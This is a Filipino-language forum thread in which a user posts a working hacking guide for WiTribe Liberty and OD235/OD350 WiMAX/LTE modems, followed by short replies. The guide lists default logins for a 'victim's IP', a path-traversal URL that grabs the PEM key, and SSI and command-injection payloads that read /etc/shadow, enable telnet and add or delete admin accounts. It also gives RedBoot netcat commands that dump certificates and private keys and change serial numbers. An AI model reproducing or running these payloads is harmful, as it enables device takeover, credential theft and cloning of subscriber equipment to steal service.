What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

BAGSAKAN 2015 ! - cr4mfs sy

Status
Not open for further replies.
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

labas mo na din pag ayos ng closed port using redboot :D
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

wimax1019 said:
labas mo na din pag ayos ng closed port using redboot :D
Click to expand...

oo nga sir cramfs :) sa dv sana hahaha :D

hirap ng no gui may taning buhay </3

di maconfigure pag na dc :lolcard:
 
cramfs <<<<<<remoter ng 22m ko eh winasak pa :slap::slap: hindi nmn siguro kaw yun TS kasi bat tumutulong ka nmn baka ginamit lang pangalan mo sumalangit nawa kung sino man sya
 
cr4mfs sy said:
LIBERTY WIXB-175x204 PEMKEY GRABBING​

STEP # 1

On Mozilla Browser Oepn Victims IP. LOGIN using this possible credentials

witribe
witribe123
witribe12345

STEP # 2

Press CTRL + SHIFT key. Click Debugger Tab. At the left side makikita mo ang sysconf.cgi. Itapat mo ang CURSOR mo sa sysconf.cgi upang makita mo ang URL
at Lumabas ang SID. Pagdating sa timestamp kahit default timestamp lang na lalabas sa Address bar mo.

View attachment 1040555

STEP # 3

Open NEW TAB > Copy and Paste this Exploit. ilagay ang nararapat na ip address at SID at TIMESTAMP.
then press ENTER lalabas na ang mahiwagang PEMKEY.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=ilagay dito ang sid&timestamp=ilagay dito ang timestamp

View attachment 1040557


OPTIONAL:
SA MGA MARUNONG GUMAMIT NG TAMPER DATA MAS MADALI DITO.

1. LOGIN TO VICTIMS GUI.

2. Go to Personalize Tab > Device Name .. ilagay sa New Device Name FOO. Huwag muna iclick ang APPLY.

3. Open Tamper Data then Click START then Click mo na ang APPLY.

4. Uncheck mo yung Continioue Tampering. Then Click Tamper.

5. Then Click OK

View attachment 1040562


6. hanapin mo ang GET right Click mo yun Choose Replay Browser

View attachment 1040560

7. Dapat ganito lalabas after mo piliin ang Replay Browser. may makikita ka doon na Personalize_password. Papalitan mo yun ng ../../tmp/var/client.pem Then Click Okay. then magoopen syang ng New Tab at lalabs doon ang Pemkey.

View attachment 1040565


=======================================================================
BACKDOOR COMMANDS
=======================================================================​

Tamper Data Method:

1. Gayahin lang ang Method ng Tamper Data via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again hanapin ang GET > right Click Then Choose Replay Browser.lalabas doon ay Personalize_password palitan mo ng ../../etc/hosts Then click OK

6 .TELNET IS NOW ENABLE




====================================================
COMPLETE REDBOOT COMMAND
====================================================​

BEFORE ANYTHING ELSE, GUSTO KO SABIHIN NA HINDI KO ITO NA LEECH KANINUMAN. IPAPAKITA KO DITO ANG PROCESS KUNG PAANO KO NAKUHA ANG COMMAND NG REDBOOT. HERE'S THE PROOF.

1. GAMITIN MO ANG TOOL NG CERT-WRITER.EXE AT SNWRITER.EXE GALING SA BM622M .

2. DOWNLOAD WIRESHARK

3. NGAYON CLOSE ALL BROWSERS AT RUNNING APPLICATION PARA DI ITO MADETECT NG WIRESHARK.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. CHOOSE INTERFACE SA WIRESHARK PILIIN ANG LAN INTERFACE THEN CLICK START. OPEN CERT-WRITER.EXE THEN CLICK CONNECT
THEN MAG UPLOAD KA NG CERTIFICATE AT PRIVATE KEY. ITO AY PARA MAKITA SA WIRESHARK KUNG PAANO MAG WRITE NG PEMKEY.

6. AFTER MAIUPLOAD ANG PEM AT KEY CLICK VERIFY PARA MA DUMP MO NAMAN ANG PEM AT KEY AT MAKITA SA WIRESHARK.

7. PUNTA KA SA WIRESHARK HANAPIN MO DOON YUNG 192.168.15.1
IMAGE:
View attachment 1040791

8. RIGHT CLICK MO ANG 192.168.15.1 THEN CHOOSE "FOLLOW TCP STREAM" MAKIKITA MO NA NAIRECORD NYA ANG MGA COMMAND AT OUTPUT NG REDBOOT.PWEDE MO RIN SYA ISAVE.

IMAGE:
View attachment 1040794


"PARA PO SA KAALAMAN NG NAKARARAMI MAGKAIBA PO ANG FORMAT NG PAGHUGOT NG PEM AT KEY NG WI-TRIBE AT SMART."

SMART DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code: 
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE----- 
-----END RSA PRIVATE KEY-----


WI-TRIBE DUMP PEM AT KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code: 
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

Code: 
RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk


ANG LAHAT NG ITO AY MAY BASEHAN, NORMALLY MAKAKAPAG REDBOOT KA SA PORT 9000 LANG. ITO AY MAGAGAWA LAMANG SA LAN CONNECTION. WELL KNOWN NA SA ATIN YAN MATAGAL NA.

Code: 
EXAMPLE: 
telnet 192.168.15.1 9000

redboot>


ANG PAG REDBOOT NAMAN SA LOOB NG TELNET NA NAGAGAWA SA WAN AT LAN AY MAY BASEHAN AKO KUNG PAANO KO NAKUHA AT DI KO ITO NA LEECH KANINUMAN.

ANG LOGIC AY MATATAGPUAN SA LOOB NG /init.d/boot_update File Directory.

View attachment 1040797


================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================​

Code: 
[COLOR="#0000FF"]BROWSER BACK DOOR OD235
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+[COLOR="#008000"]cat+/etc/shadow[/COLOR]

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1
PAPALITAN MO ANG /etc/shadow depende sa nais mo makita.

CHANGE ADMIN LOGIN SA OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

Code: 
[COLOR="#0000FF"]OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser 

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

[COLOR="#0000FF"]CHANGE ADMIN LOGIN SA OD235 ONLY !![/COLOR]
OPEN FIRST TAB THEN PASTE THIS THEN IT WILL SAYS SUCCESFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

[COLOR="#0000FF"]OPEN NEW TAB
PASTE THIS COMMAND LINK.DOON LALABAS ANG RESULT[/COLOR]
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;
Code: 
fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
WALA AKONG PANANAGUTAN KUNG ANO MAN ANG MANGYARI SA INYONG DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
WALA NA PO AKONG PANANAGUTAN KUNG ITO PO AY GAMITIN SA ILLEGAL . USE IT AT YOUR OWN RISK



ENJOY :)

CR4MFS SY
Click to expand...
Ang galing mo.. pag aaralan ko 2.
 
problima ko nalang paanu mapagana ang smart sim sa od 235,,,, sana may maglabas ng tool
 
djnirds said:
problima ko nalang paanu mapagana ang smart sim sa od 235,,,, sana may maglabas ng tool
Click to expand...

di po yan puede, for globe postpaid sim lang talaga si od235
 
may nakita akong thread na openline nya daw sa smart, pero 15.1 pa ip nya, yung unang labas na od235 ng globe, nasa firmware lang yan
 
djnirds said:
may nakita akong thread na openline nya daw sa smart, pero 15.1 pa ip nya, yung unang labas na od235 ng globe, nasa firmware lang yan
Click to expand...

open line sya sa wimax mode, smart/globe pero sa lte, purely globe lang sya at postpaid lte sim pa unless gawin mo syang GP FIRMWARE then puede sya sa globe preoaid lte sim
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

pwede bang ma change mac ang liberty?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

niceeeeeeeeeeeeeee
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

CINR READING 27
MAX-MODEM
EQ-END-DATE Jan 01, 1900
INSTALLDATE Jan 4 2015 2:23PM
 
Last edited:
cr4mfs sy said:
Updated na po !!

Lahat na po anjan na
Click to expand...


Pedik said:
open line sya sa wimax mode, smart/globe pero sa lte, purely globe lang sya at postpaid lte sim pa unless gawin mo syang GP FIRMWARE then puede sya sa globe preoaid lte sim
Click to expand...

Sir Cramfs At Sir Pedik...

Tanong ko lang kung tama ang landas ko. Parang napasok ko Admin/Operator account kaso mag kaiba kami ng SS ni Cramfs e.

YXat1JN.png





ETO SS mo Sir Cramfs dati.
attachment.php
 
alma240279 said:
boss slmat nkaadmin nko sa od350 ko :)
Click to expand...

sir pano po procedure para ma-access yung admin ng od350 sir? salamat po
pm mo na lang po ako sir kung di pede ilagay dito sir.
 
Last edited:
@logie0726

Operator access nga ang napasok mo sir
 
Status
Not open for further replies.

Similar threads

jalexzia
Cert And Key Grabbing HOT HOT HOT....
2 3 4
Replies
71
Views
11K
kerygmaa
K
logie0726
OD235 Change Admin, SMART SIM, PEM/KEY, APN, FREQ, SMS, POE and More...
25 26 27 28 29
Replies
577
Views
79K
Antotitot
A
muhua00
OD-235 using WireShark
Replies
2
Views
938
demonic666
demonic666
B
Sa mga ka tribo jan. Dagdagan natin info para mactv8 na witribe
Replies
18
Views
2K
getbounce
getbounce
Back
Top Bottom